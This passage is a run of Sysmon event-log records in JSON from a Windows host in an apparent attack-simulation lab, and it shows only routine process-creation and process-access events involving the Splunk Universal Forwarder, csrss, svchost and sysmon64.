Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.195","ProcessGuid":"{A837DB8D-03E6-5F25-0000-0010E00C0B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5973,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03E6-5F25-0000-0010E00C0B00}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03E6-5F25-0000-0010E00C0B00}","TargetProcessId":"2476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5974,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03E6-5F25-0000-0010E00C0B00}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03E6-5F25-0000-0010E00C0B00}","TargetProcessId":"2476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5975,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5976,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5977,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5978,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5979,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5980,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\